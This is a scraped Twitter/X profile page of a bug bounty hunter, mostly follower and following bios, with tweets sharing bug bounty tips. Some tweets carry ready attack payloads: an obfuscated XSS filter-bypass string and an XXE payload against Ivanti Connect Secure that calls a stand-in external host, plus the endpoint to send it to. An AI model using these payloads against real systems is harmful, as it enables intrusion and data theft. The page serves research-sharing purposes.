I¯\_(ツ)_/¯I \ (•◡•) / @BountyOverflow
BBH ( ͡° ͜ʖ ͡°) 💰 @Bugcrowd Top 50 \o/ ✌️ MVP✌️ I am here to learn/share application security stuff ✌️ I enjoy finding auth bypass bugs 🐞 🌎 Earth 🌎 Joined December 2010-
Tweets1K
-
Followers6K
-
Following1K
-
Likes3K
Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call,…
XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror=" 𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()" #xss
I ❤️ DNS I’ve spent 2 years full-time building nslookup.io. Now, I’m teaching everything I know in this course.
I wrote a primer on ffuf. danielmiessler.com/study/ffuf/ #infosec #webhacking
I am sharing biggest #BugBountytip today: You will never know unless you Try! #BugBounty
CVE-2024-22024, XXE on Ivanti Connect Secure payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm #bugbountytips #cve #Ivanti
Find Leaked Credentials Using Google Chrome dev Tools github.com/h4x0r-dz/Leake… Credit:@h4x0r_dz #bugbountytips #bugbounty
I ❤️ DNS I’ve spent 2 years full-time building nslookup.io. Now, I’m teaching everything I know in this course.
Ganglia Unauthenticated Dashboard P1 or P4? youtu.be/E2wPkcRRC6A Kudos to @RootxRavi for sharing his findings with us. #bugbounty #cybersecurity #infosec
@Masonhck3571 There you go github.com/majd/ipatool
@silentgh00st This is very similar to my Venmo attack. Cookies and old APIs: youtu.be/jvrFXe2yONM
Not many people know this, but if your site have open redirect and client side path traversal, you can steal CSRF token header via CORS request. That why at LinkedIn I've patched XHR.open long time ago.
Not many people know this, but if your site have open redirect and client side path traversal, you can steal CSRF token header via CORS request. That why at LinkedIn I've patched XHR.open long time ago. https://t.co/puMW69SweL
@G0LDEN_infosec @aszx87410 @terjanq @kevin_mizu @garethheyes are a good start. Gareths book, the three other have a lot of posts on blogs etc. Things like this aszx87410.github.io/beyond-xss/en/
@TanmayLP7 some really great examples here: docs.google.com/presentation/d…
My findings are mostly Secondary context path traversals API issues (Mostly REST and GraphQl) Reverse proxy misconfigurations - lead to a 0day; which i had fun exploiting with @ArmanSameer95 and @codecancare across the internet Oauth Issues - Luckily , I found a 0 user…
Whats happening in India? Who will be the next PM?
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS (github.com/nvn1729) [critical] using @pdnuclei Nuclei Template : github.com/projectdiscove… #cve #nextchat #chatgpt #xss #ssrf #pdteam #hackwithutomation
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS (github.com/nvn1729) [critical] using @pdnuclei Nuclei Template : github.com/projectdiscove… #cve #nextchat #chatgpt #xss #ssrf #pdteam #hackwithutomation https://t.co/d6T4HmlPD4
Aditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍🇸🇦 ROOD | GOAT @0x_rood
21K Followers 299 Following Ich heiße rood | born to be bug hunter | more than 1000 bugsMd Ismail Šojal @0x0SojalSec
22K Followers 4K Following Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||Jason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.Kanhaiya Sharma @krishnsec
15K Followers 431 Following Cyber security | Top 20 P1 warrior @Bugcrowd | Top 50 globally ( https://t.co/8Fo8sBpaLl )Het Mehta @hetmehtaa
24K Followers 953 Following Security Analyst | Content Creator | I Spread Cyber Security & Talk about AI, Cloud, Tech, Tools & UpdatesLu3ky13 ⚡️⚡️ @lu3ky13
10K Followers 728 Following ṙ̷̐̊̉̈͒̓̒̈́̐̀̓̅̂̈́̎́̉̋͌̚̚̕Security Researcher And Security Developer #CAPen #CAP #ewpt #ccna #CCSP-AWS #BS.Accounting CEO @CyberShield01⚡️⚡Tuan Anh Nguyen 🇻�.. @haxor31337
13K Followers 2K Following 28 y/o Bug Bounty Hunter and Red Teamer at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @BugcrowdTushar Verma 🇮🇳 @e11i0t_4lders0n
21K Followers 796 Following Offensive Security Consultant at NST-Cyber | @SynackRedTeam Member | Public Speaker | Open for Freelance EngagementsMasonhck357 @Masonhck3571
14K Followers 715 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe.Fat @fattselimi
12K Followers 7K Following Hacking for fun and profit @Hacker0x01 @Bugcrowd @intigriti #CyberSecurity #1 @BMWGroup | Pentester @CytadelEuYS @YShahinzadeh
10K Followers 325 Following Bug Hunter, Security consultant - My Farsi Tweets go @voorivexMajeed @sudo_uwu
69 Followers 563 Following Self-taught 🥷🏻 Open Source 😼 Distro Hopper 🥴 { DevOps | CyberSecurity | Networking | Linux }RUOK194 @anonymo58548576
87 Followers 1K FollowingRaduim راديوم @raduimofficial
14 Followers 88 Following Cyber Assistant | CSO 🩶 0x0000000A ^; ( COS CA PT SA ) And 5 years experience , More 🥰Brajesh @Brajesh_1230
3 Followers 119 FollowingNobodyOn @jangdonghy94867
0 Followers 31 Followingnull @th60_
0 Followers 664 Followingdeepanshu garg @deepans81474562
8 Followers 100 Following passionate about cyber security 💡 https://t.co/PkuN5nwT99|_0K€$|-| R€|)|)�.. @deathzone007
68 Followers 827 Following 🔥Developer, Tech & Cyber Enthusiast, Learning Hacking👨💻. Feel free to send me the resources that you feel are super cool.randomnewname2234 @randomnewn13635
20 Followers 137 FollowingAbdenour @0xOnavty
3 Followers 289 FollowingLittleAttack3r🖥️ @attackbro12
12 Followers 141 Following I'm studying hacking and working hard as a hacker, bugbounter :)🖥I majored in Security Engineering and have master's degree.🎓 Let's Hack Together!Susnata Seal @SusnataSeal
66 Followers 283 Followingx_x @eightninetenjq
11 Followers 455 Followingsanga Mahesh @sangaMahesh118
2 Followers 262 FollowingMoundir Kb @Moundirkb
5 Followers 389 Following Cyber Security Consultant & Penetration Tester | SOC Analyst | Security Researcher | CTF Player @HTBambassador @amb645540
0 Followers 974 FollowingNeda @Neda62455817
9 Followers 79 FollowingShabriri @Shabriri_elden
0 Followers 110 FollowingAnonymous @B_D3aTH
130 Followers 768 Followingdv3 @2gouzz
36 Followers 508 Followingkübra @kubrakirdar
17 Followers 659 FollowingYua Terdue 💀 $ELS .. @YTerdue76940
88 Followers 639 FollowingVikas Maurya @vikas0vks
18 Followers 196 Following Bug Bounty Hunter 🐞 | Cybersecurity Enthusiast 💻 | Ethical Hackeraiger @mrirfan___07
62 Followers 620 Following researcher 🦕 pentester 😈 programmer python android hacking and video creator 😎arjun @arjun6911260487
12 Followers 58 FollowingMohammad Mansour @0X_Mans1337
9 Followers 792 Following 0X_Mans1337 Bug Bounty Hunter Web Penetration Tester Cyber Security Researcherassadsadat @assadsadat76395
10 Followers 137 FollowingParth Narula @rootxparth
19 Followers 76 Following 16 yr | Security Researcher | 2.5 years+ experience | Red Teamer | Pentester | Bug Hunter | CTF Player | Ethical Hacker0xsniper09c @0xsniper09c
18 Followers 153 FollowingEl Mehdi @elmehdimee
290 Followers 173 Following bug bounty hunter, https://t.co/IgwNoFRWmO , https://t.co/0DPtWr7tZ8 , https://t.co/eG6Su8DLgbJess @Hogarth45_
2K Followers 352 Following Reformed Baptist Son Of A Shepard Hackerone's Bottom 10 list since 2014Secure By Bhavesh ⚡.. @SecureByBhavesh
7 Followers 183 Following Software tester with over ten years of experience , YouTuber (17k Subs) and Security Researcher working to make the internet a safer place for all usersDavid Liu @dliuxun
5 Followers 34 Followingkian Am @kianalaspro
2 Followers 87 Following Everything. Anime🌓 Favorite words: serial knowledge and pizza Desire: to learn everything🖥️ Computer:❤️mohamed ali @mhmmd_aliiii
10 Followers 1K FollowingHatxhdh @Webcreep2
249 Followers 3K Following VulnerabilityResearcher,patch,Pen testing || forensic scientist || Ghostwriting || Copy writing || OSINT lover 💥ATOMIC @atomic0x01
19 Followers 487 FollowingAditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍bugcrowd @Bugcrowd
160K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™🇷🇴 cristi @CristiVlad25
38K Followers 151 FollowingHussein Daher @HusseiN98D
43K Followers 151 Following Entrepreneur, Hacker 🇱🇧🇨🇮 @WebImmunify 27th/270000 BugCrowd Hacking PlatformSam Curry @samwcyo
77K Followers 943 Following Hacker, bug bounty hunter. Run a blog to better explain web application security.Jason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.Kanhaiya Sharma @krishnsec
15K Followers 431 Following Cyber security | Top 20 P1 warrior @Bugcrowd | Top 50 globally ( https://t.co/8Fo8sBpaLl )Corben Leo @hacker_
68K Followers 659 Following I hack stuff (legally) | Jesus follower | Co-founder @boringmattresshakluke @hakluke
88K Followers 2K Following Hacker, bounties, entrepreneur. I help cybersecurity companies produce amazing content for their blogs and socials. Founder of: @haksecio and @hacker_contentpayloadartist @payloadartist
34K Followers 288 Following Tweeting about Application Security, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my ownJulien | MrTuxracer �.. @MrTuxracer
30K Followers 417 Following Freelancer | Full-time #BugBounty | @Hacker0x01 H1-Elite & $1,500,000 Hacker | ❤️ IDA ProTuan Anh Nguyen 🇻�.. @haxor31337
13K Followers 2K Following 28 y/o Bug Bounty Hunter and Red Teamer at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @BugcrowdBug Bounty Reports Ex.. @gregxsunday
38K Followers 555 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.shubs @infosec_au
50K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnoteYassine Aboukir 🐐 @Yassineaboukir
26K Followers 338 Following HackerOne Top 20, Pentest Lead, Ambassador, MVH Title and Hacker Advisory Board • Digital Nomad • Aspiring Athlete.El Mehdi @elmehdimee
290 Followers 173 Following bug bounty hunter, https://t.co/IgwNoFRWmO , https://t.co/0DPtWr7tZ8 , https://t.co/eG6Su8DLgbEbrietas @Ebrietas0
4K Followers 190 Following Security @ Phantom Wallet, former TikTok & Blizzard. All tweets are my own.Ankita Gupta @ankitaiitr
1K Followers 1K Following Cofounder and CEO @aktodotio | @iitroorkee @DartmouthSadhguru @SadhguruJV
4.1M Followers 4 Following Yogi, Mystic, Visionary & Founder, @ishafoundation. Tweets from Sadhguru himself are signed -Sg. #SaveSoil #ConsciousPlanet | @cpsavesoilBirendra Sah @birendrasah4u2
1 Followers 64 FollowingKhaled Samy @khaleedsamy12
704 Followers 664 Following Hey there! Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you.Ryan G. Cox @RyanGCox_
507 Followers 163 Following I write about my life - Tech, Business, Fitness, Sports... whatever comes to mind.Ron Masas @RonMasas
1K Followers 197 Following trying to predict the next token to make you think i’m a security researcher.H1 Disclosed - Public.. @h1Disclosed
7K Followers 1 Following User friendly unofficial HackerOne public disclosures, keeps you updated about the recently disclosed bugs. Made With ♥ By Hackers For Hackers. - @rohsecJayesh Madnani @Jayesh25_
11K Followers 354 Following CEO and Hacker in charge @ EIS | HackerOne Top 15 | https://t.co/JSX03WutFNJenish Sojitra @_jensec
16K Followers 576 Following Security & Finance. HackerOne Top 20 Hackers of all Time. Security at Exodus.Maciej Piechota @haqpl
4K Followers 1K Following I’m a security enthusiast and technology polyglot, pug lover and drum’n’bass head. Vice Captain @justCatTheFish, HTB @AlphaPwners, Daily Pwning @SECFORCE_LTDAndy Li @andyfeili
7K Followers 273 Following Finding bugs in Smart Contracts 🔎 | Podcast Host 🎙️ | Security Engineer @sigp_io σ'Ananda Dhakal @dhakal_ananda
10K Followers 578 Following Vulnerability Researcher @patchstackapp | Brand Ambassador @Hacker0x01 | Blogs: https://t.co/a0aOojdwyl 🇳🇵Chukwuma @B2Chukwuma
2K Followers 2K Following https://t.co/5j88QDF3TB About Tech, Jokes n Facts. https://t.co/ZXaHB5XsL8 HTML/CSS/JAVASCRIPT/ ⚛️React/Node.js /WordPress/LaravelAmal Murali @amalmurali47
1K Followers 1K Following Team Lead - Security Operations at @Bugcrowd. Interested in Information Security. BBAC certified. Opinions are my own. He/him.Mackenzie MacKenzie �.. @0xMackenzieM
2K Followers 749 Following Hacker Success @immunefi, Helping whitehats get paid, DMs open.Godfather Orwa 🇯�.. @GodfatherOrwa
17K Followers 1K Following Hacker | Bug Hunter | Cooker | Top 3 P1 Warrior On https://t.co/dzFQH75OWj | https://t.co/TdLNCtmEGt | LevelUpX Champion | 10+ 0Days/CVEsJonathan Bouman @JonathanBouman
5K Followers 466 Following Medical Doctor (GP) & Security Researcherbrendan @bscarvell
2K Followers 642 Following I'm mnz. A security researcher, penetration tester and member of the @thegooniesctf team in Australia. No logs, no crime. PGP: 0x9f7d181d1f4a51b2Mohsin Khan 🇮🇳 @tabaahi_
15K Followers 218 Following Full-time Bug Hunter, Real Estate & Stock Market Trader. Listed at more than 100 companies hall of fame.Borna Nematzadeh @LogicalHunter
3K Followers 219 Following Microsoft MVR | Google Top Bug Bounty Hunter | Security Researcher | @alectrona_ethethicalbughunter @ethicalbughuntr
508 Followers 61 Following Ethical Technology builder, hacker, pentester, bug-bounty hunter. Current all-time rank 12th @Bugcrowd. securing systems along with the great folks at InfoSec.harris0ft @harris0ft
2K Followers 107 Following Hacker, Independent Security Researcher. hackerone All-Time Top 100 | https://t.co/ylJxk5BU2KDafydd Stuttard @DafyddStuttard
6K Followers 74 Following Founder and Chief Swig at @PortSwigger. Creator of @Burp_Suite and @WebSecAcademy. Author of The Web Application Hacker's Handbook.Khoi Duong @khoiasd
485 Followers 31 FollowingBojan Zdrnja @bojanz
5K Followers 698 Following IT Security guy, penetration testing is my thing. One of the SANS Internet Storm Center handlers at https://t.co/KLxU4pooKI. SANS SEC542 instructor and course co-author.CVE Trends @CVEtrends
9K Followers 0 Following Monitor trending CVEs in real-time; crowdsourced intel sourced from Twitter, NIST NVD, Reddit, and GitHub. Run by @SimonByteMother of Hackers @HackersMother
1K Followers 14 Following Mother of hackers https://t.co/q7m0BerR8d𝚑𝚊𝚛𝚛𝚢�.. @GertyBoy27
3K Followers 779 Following InfoSec/GameDev/Personal tweets - https://t.co/V0f9u4tOMv | https://t.co/vP8SDOwdO1 | https://t.co/JltUCRBTYOAbdulrahman Makki | �.. @AMakki1337
11K Followers 204 Following Bug Hunter, HackerOne Saudi Arabia Ambassador 🇸🇦 - @BugBountySA 1st Place🥇 - @Hacker0x01 SA 1st Place🥇 - #BlackhatMEA Winner🏆 - #1337up0822 Winner🏆akincibor.eth @akincibor1
2K Followers 993 Following White Hat || Bug Bounty Hunter || SRT || Web2 & Web3 || #Bitcoin #EthereumMichele Romano @Mik317_
4K Followers 2K Following "The walls of Sparta are the chests of its warriors" - AgesilaoMohamed Elkhayat @Mohamed87Khayat
11K Followers 277 Following Communication Engineer Senior Cyber Security - security researcher & BugBounty Hunter - 13 years experienceMiDo 🇵🇸 @mido0x0x
3K Followers 1K Following Cyber security consultant @ https://t.co/sorL2mpu05 Bug hunter: https://t.co/3TXvWdiDy1 #Zamalek ❤️douglasday.eth @ArchAngelDDay
8K Followers 235 Following Truth Seeker. Catholic. Bug Bounty Hunter. Crypto Enthusiast. Chasing my Apotheosis. Views are correct. Truth is at the intersection of Athens & Jerusalem0x2458 🇮🇳 @0x2458
781 Followers 201 Following Passionate cybersecurity Researcher | Bug hunter | Penetration tester | Bugcrowd & HackerOne | 17y/o | Hacked Dutch Government, Indian Government && NASA 🔥🐈⬛ Cyber Kitt.. @th3cyb3rk1tt3n
3K Followers 1K Following Aireal | Technical Pentest Manager @ BugCrowd Infosec 💻 | Gaming 🕹 | Cats 🐱 | Kindness 🌻 🐝 My opinions are my own.@chybeta Damn man. I just want patience like you. Also for that much comments you deserve atleast 3x bounty:)
@BountyOverflow I used ollama to host command-r model which have better context length & suitable for RAG , planning to add all hackerone & medium articles related to bugbounty , hopefully it will suggest attack scenarios based on burp request. freecodecamp.org/news/mastering…
@ashu_barot @NASA awesome bro, now with that paper try to buy a hotdog xd @bxmbn
Burp crashes every hour? Are you a little girl or something? Can't you handle some pressure?
I wrote a primer on ffuf. danielmiessler.com/study/ffuf/ #infosec #webhacking
@BountyOverflow You will never know it's a Duplicate unless you Try! You will never know it's a Triager unless you Try!
Find Leaked Credentials Using Google Chrome dev Tools github.com/h4x0r-dz/Leake… Credit:@h4x0r_dz #bugbountytips #bugbounty
📢 If you haven't heard by now, there's a new big security vulnerability: CVE-2024-3094 aka the libxz-utils backdoor. 😳 What's most shocking? The backdoor was introduced by none other than Jia Tan, a long-time maintainer of the XZ library. Per boehs.org/node/everythin… the…
I ❤️ DNS I’ve spent 2 years full-time building nslookup.io. Now, I’m teaching everything I know in this course.
Ganglia Unauthenticated Dashboard P1 or P4? youtu.be/E2wPkcRRC6A Kudos to @RootxRavi for sharing his findings with us. #bugbounty #cybersecurity #infosec
I really appreciate the programs that triaged & paid me in a day/week. I rarely see such good & fast programs.
@Masonhck3571 There you go github.com/majd/ipatool
@cysky0x1 @Bugcrowd @RelentlessT7 Nobody can compete with Tal, including all bug bounty platforms. He's the fastest triager on Planet Earth. Also the kindest person 🫡
Here is short writeup on how I managed to access 200k+ of PII data by exploiting a simple vulnerability and accessing admin dashboard! 📌Thread📌 1. I created an account with a simple user and one endpoint caught my attention (it was /api/v1/session)
@disclosedh1 i still find it bonkers that h1 triage have the power to say "nope this isn't a bug!" & close reports for companies they don't work for. imagine if x/twitter didn't review this report. not a good look for h1 triage